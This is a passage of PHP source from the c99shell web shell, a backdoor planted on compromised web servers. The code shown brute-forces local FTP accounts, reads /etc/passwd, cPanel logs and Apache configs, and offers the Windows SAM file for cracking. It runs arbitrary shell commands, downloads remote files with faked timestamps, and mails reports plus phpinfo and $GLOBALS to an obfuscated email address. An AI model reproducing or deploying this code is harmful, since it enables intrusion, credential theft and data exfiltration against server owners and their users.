  1903. if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1904. }
  1905. ob_flush();
  1906. $i = $success = 0;
  1907. $ftpquick_st = getmicrotime();
  1908. while(!feof($fp))
  1909. {
  1910. $str = explode(":",fgets($fp,2048));
  1911. if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
  1912. {
  1913. echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
  1914. $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
  1915. if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1916. $success++;
  1917. ob_flush();
  1918. }
  1919. if ($i > $fqb_lenght) {break;}
  1920. $i++;
  1921. }
  1922. if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
  1923. $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
  1924. echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
  1925. $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
  1926. if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1927. if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
  1928. fclose($fqb_logfp);
  1929. }
  1930. }
  1931. else
  1932. {
  1933. $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
  1934. $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
  1935. echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
  1936. }
  1937. }
  1938. }
  1939. if ($act == "d")
  1940. {
  1941. if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
  1942. else
  1943. {
  1944. echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
  1945. if (!$win)
  1946. {
  1947. echo "<tr><td><b>Owner/Group</b></td><td> ";
  1948. $ow = posix_getpwuid(fileowner($d));
  1949. $gr = posix_getgrgid(filegroup($d));
  1950. $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
  1951. }
  1952. echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
  1953. }
  1954. }
  1955. if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
  1956. if ($act == "security")
  1957. {
  1958. echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
  1959. if (!$win)
  1960. {
  1961. if ($nixpasswd)
  1962. {
  1963. if ($nixpasswd == 1) {$nixpasswd = 0;}
  1964. echo "<b>*nix /etc/passwd:</b><br>";
  1965. if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
  1966. if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
  1967. echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
  1968. $i = $nixpwd_s;
  1969. while ($i < $nixpwd_e)
  1970. {
  1971. $uid = posix_getpwuid($i);
  1972. if ($uid)
  1973. {
  1974. $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
  1975. echo join(":",$uid)."<br>";
  1976. }
  1977. $i++;
  1978. }
  1979. }
  1980. else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
  1981. }
  1982. else
  1983. {
  1984. $v = $_SERVER["WINDIR"]."\repair\sam";
  1985. if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
  1986. else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</font></b><br>";}
  1987. }
  1988. if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
  1989. if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
  1990. if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1991. if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1992. if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
  1993. if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
  1994. if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
  1995. function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
  1996. displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
  1997. displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
  1998. displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
  1999. displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
  2000. displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
  2001. displaysecinfo("RAM",myshellexec("free -m"));
  2002. displaysecinfo("HDD space",myshellexec("df -h"));
  2003. displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
  2004. displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
  2005. displaysecinfo("Is cURL installed?",myshellexec("which curl"));
  2006. displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
  2007. displaysecinfo("Is links installed?",myshellexec("which links"));
  2008. displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
  2009. displaysecinfo("Is GET installed?",myshellexec("which GET"));
  2010. displaysecinfo("Is perl installed?",myshellexec("which perl"));
  2011. displaysecinfo("Where is apache",myshellexec("whereis apache"));
  2012. displaysecinfo("Where is perl?",myshellexec("whereis perl"));
  2013. displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
  2014. displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
  2015. displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
  2016. displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
  2017. }
  2018. if ($act == "mkfile")
  2019. {
  2020. if ($mkfile != $d)
  2021. {
  2022. if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
  2023. elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
  2024. else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
  2025. }
  2026. else {$act = $dspact = "ls";}
  2027. }
  2028. if ($act == "encoder")
  2029. {
  2030. echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
  2031. foreach(array("md5","crypt","sha1","crc32") as $v)
  2032. {
  2033. echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
  2034. }
  2035. echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
  2036. <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
  2037. <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
  2038. echo "<center>base64_decode - ";
  2039. if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
  2040. else
  2041. {
  2042. $debase64 = base64_decode($encoder_input);
  2043. $debase64 = str_replace("\0","[0]",$debase64);
  2044. $a = explode("\r\n",$debase64);
  2045. $rows = count($a);
  2046. $debase64 = htmlspecialchars($debase64);
  2047. if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
  2048. else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
  2049. echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
  2050. }
  2051. echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
  2052. $c = strlen($encoder_input);
  2053. for($i=0;$i<$c;$i++)
  2054. {
  2055. $hex = dechex(ord($encoder_input[$i]));
  2056. if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
  2057. elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
  2058. }
  2059. echo "\" readonly><br></center></form>";
  2060. }
  2061. if ($act == "fsbuff")
  2062. {
  2063. $arr_copy = $sess_data["copy"];
  2064. $arr_cut = $sess_data["cut"];
  2065. $arr = array_merge($arr_copy,$arr_cut);
  2066. if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
  2067. else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
  2068. }
  2069. if ($act == "selfremove")
  2070. {
  2071. if (($submit == $rndcode) and ($submit != ""))
  2072. {
  2073. if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); }
  2074. else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
  2075. }
  2076. else
  2077. {
  2078. if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
  2079. $rnd = rand(0,9).rand(0,9).rand(0,9);
  2080. echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
  2081. }
  2082. }
  2083. if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
  2084. if ($act == "feedback")
  2085. {
  2086. $suppmail = base64_decode("bmV0LXRodWdAbXNuLmNvbQ==");
  2087. if (!empty($submit))
  2088. {
  2089. $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
  2090. $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
  2091. if (!empty($fdbk_ref))
  2092. {
  2093. $tmp = @ob_get_contents();
  2094. ob_clean();
  2095. phpinfo();
  2096. $phpinfo = base64_encode(ob_get_contents());
  2097. ob_clean();
  2098. echo $tmp;
  2099. $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
  2100. }
  2101. mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
  2102. echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
  2103. }
  2104. else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
  2105. }
  2106. if ($act == "search")
  2107. {
  2108. echo "<b>Search in file-system:</b><br>";
  2109. if (empty($search_in)) {$search_in = $d;}
  2110. if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
  2111. if (empty($search_text_wwo)) {$search_text_regexp = 0;}
  2112. if (!empty($submit))
  2113. {
  2114. $found = array();
  2115. $found_d = 0;
  2116. $found_f = 0;
  2117. $search_i_f = 0;
  2118. $search_i_d = 0;
  2119. $a = array
  2120. (
  2121. "name"=>$search_name, "name_regexp"=>$search_name_regexp,
  2122. "text"=>$search_text, "text_regexp"=>$search_text_regxp,
  2123. "text_wwo"=>$search_text_wwo,
  2124. "text_cs"=>$search_text_cs,
  2125. "text_not"=>$search_text_not
  2126. );
  2127. $searchtime = getmicrotime();
  2128. $in = array_unique(explode(";",$search_in));
  2129. foreach($in as $v) {c99fsearch($v);}
  2130. $searchtime = round(getmicrotime()-$searchtime,4);
  2131. if (count($found) == 0) {echo "<b>No files found!</b>";}
  2132. else
  2133. {
  2134. $ls_arr = $found;
  2135. $disp_fullpath = TRUE;
  2136. $act = "ls";
  2137. }
  2138. }
  2139. echo "<form method=POST>
  2140. <input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
  2141. <b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
  2142. <br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
  2143. <br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
  2144. <br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
  2145. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
  2146. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
  2147. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
  2148. <br><br><input type=submit name=submit value=\"Search\"></form>";
  2149. if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
  2150. }
  2151. if ($act == "chmod")
  2152. {
  2153. $mode = fileperms($d.$f);
  2154. if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
  2155. else
  2156. {
  2157. $form = TRUE;
  2158. if ($chmod_submit)
  2159. {
  2160. $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
  2161. if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
  2162. else {$err = "Can't chmod to ".$octet.".";}
  2163. }
  2164. if ($form)
  2165. {
  2166. $perms = parse_perms($mode);
  2167. echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
  2168. }
  2169. }
  2170. }
  2171. if ($act == "upload")
  2172. {
  2173. $uploadmess = "";
  2174. $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
  2175. if (empty($uploadpath)) {$uploadpath = $d;}
  2176. elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
  2177. if (!empty($submit))
  2178. {
  2179. global $HTTP_POST_FILES;
  2180. $uploadfile = $HTTP_POST_FILES["uploadfile"];
  2181. if (!empty($uploadfile["tmp_name"]))
  2182. {
  2183. if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
  2184. else {$destin = $userfilename;}
  2185. if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
  2186. }
  2187. elseif (!empty($uploadurl))
  2188. {
  2189. if (!empty($uploadfilename)) {$destin = $uploadfilename;}
  2190. else
  2191. {
  2192. $destin = explode("/",$destin);
  2193. $destin = $destin[count($destin)-1];
  2194. if (empty($destin))
  2195. {
  2196. $i = 0;
  2197. $b = "";
  2198. while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
  2199. }
  2200. if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
  2201. else
  2202. {
  2203. $st = getmicrotime();
  2204. $content = @file_get_contents($uploadurl);
  2205. $dt = round(getmicrotime()-$st,4);
  2206. if (!$content) {$uploadmess .= "Can't download file!<br>";}
  2207. else
  2208. {
  2209. if ($filestealth) {$stat = stat($uploadpath.$destin);}
  2210. $fp = fopen($uploadpath.$destin,"w");
  2211. if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
  2212. else
  2213. {
  2214. fwrite($fp,$content,strlen($content));
  2215. fclose($fp);
  2216. if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
  2217. }
  2218. }
  2219. }
  2220. }
  2221. }
  2222. if ($miniform)
  2223. {
  2224. echo "<b>".$uploadmess."</b>";
  2225. $act = "ls";
  2226. }
  2227. else
  2228. {
  2229. echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
  2230. Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
  2231. Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
  2232. Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
  2233. File-name (auto-fill): <input name=uploadfilename size=25><br><br>
  2234. <input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
  2235. <input type=submit name=submit value=\"Upload\">
  2236. </form>";
  2237. }
  2238. }
  2239. if ($act == "delete")
  2240. {
  2241. $delerr = "";
  2242. foreach ($actbox as $v)
  2243. {
  2244. $result = FALSE;
  2245. $result = fs_rmobj($v);
  2246. if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
  2247. }
  2248. if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
  2249. $act = "ls";
  2250. }
  2251. if (!$usefsbuff)
  2252. {
  2253. if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
  2254. }
  2255. else
  2256. {
  2257. if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
  2258. elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
  2259. elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
  2260. if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
  2261. elseif ($actpastebuff)
  2262. {
  2263. $psterr = "";
  2264. foreach($sess_data["copy"] as $k=>$v)
  2265. {
  2266. $to = $d.basename($v);
  2267. if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
  2268. if ($copy_unset) {unset($sess_data["copy"][$k]);}
  2269. }
  2270. foreach($sess_data["cut"] as $k=>$v)
  2271. {
  2272. $to = $d.basename($v);
  2273. if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
  2274. unset($sess_data["cut"][$k]);
  2275. }
  2276. c99_sess_put($sess_data);
  2277. if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  2278. $act = "ls";
  2279. }
  2280. elseif ($actarcbuff)
  2281. {
  2282. $arcerr = "";
  2283. if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
  2284. else {$ext = ".tar.gz";}
  2285. if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
  2286. $cmdline .= " ".$actarcbuff_path;
  2287. $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  2288. foreach($objects as $v)
  2289. {
  2290. $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
  2291. if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
  2292. if (is_dir($v))
  2293. {
  2294. if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
  2295. $v .= "*";
  2296. }
  2297. $cmdline .= " ".$v;
  2298. }
  2299. $tmp = realpath(".");
  2300. chdir($d);
  2301. $ret = myshellexec($cmdline);
  2302. chdir($tmp);
  2303. if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
  2304. $ret = str_replace("\r\n","\n",$ret);
  2305. $ret = explode("\n",$ret);
  2306. if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
  2307. foreach($sess_data["cut"] as $k=>$v)
  2308. {
  2309. if (in_array($v,$ret)) {fs_rmobj($v);}
  2310. unset($sess_data["cut"][$k]);
  2311. }
  2312. c99_sess_put($sess_data);
  2313. if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
  2314. $act = "ls";
  2315. }
  2316. elseif ($actpastebuff)
  2317. {
  2318. $psterr = "";
  2319. foreach($sess_data["copy"] as $k=>$v)
  2320. {
  2321. $to = $d.basename($v);
  2322. if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
  2323. if ($copy_unset) {unset($sess_data["copy"][$k]);}
  2324. }
  2325. foreach($sess_data["cut"] as $k=>$v)
  2326. {
  2327. $to = $d.basename($v);
  2328. if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
  2329. unset($sess_data["cut"][$k]);
  2330. }
  2331. c99_sess_put($sess_data);
  2332. if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  2333. $act = "ls";
  2334. }
  2335. }
  2336. if ($act == "cmd")
  2337. {
  2338. if (trim($cmd) == "ps -aux") {$act = "processes";}
  2339. elseif (trim($cmd) == "tasklist") {$act = "processes";}
  2340. else
  2341. {
  2342. @chdir($chdir);
  2343. if (!empty($submit))
  2344. {
  2345. echo "<b>Result of execution this command</b>:<br>";
  2346. $olddir = realpath(".");
  2347. @chdir($d);
  2348. $ret = myshellexec($cmd);
  2349. $ret = convert_cyr_string($ret,"d","w");
  2350. if ($cmd_txt)
  2351. {
  2352. $rows = count(explode("\r\n",$ret))+1;
  2353. if ($rows < 10) {$rows = 10;}
  2354. echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  2355. }
  2356. else {echo $ret."<br>";}
  2357. @chdir($olddir);
  2358. }
  2359. else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
  2360. echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
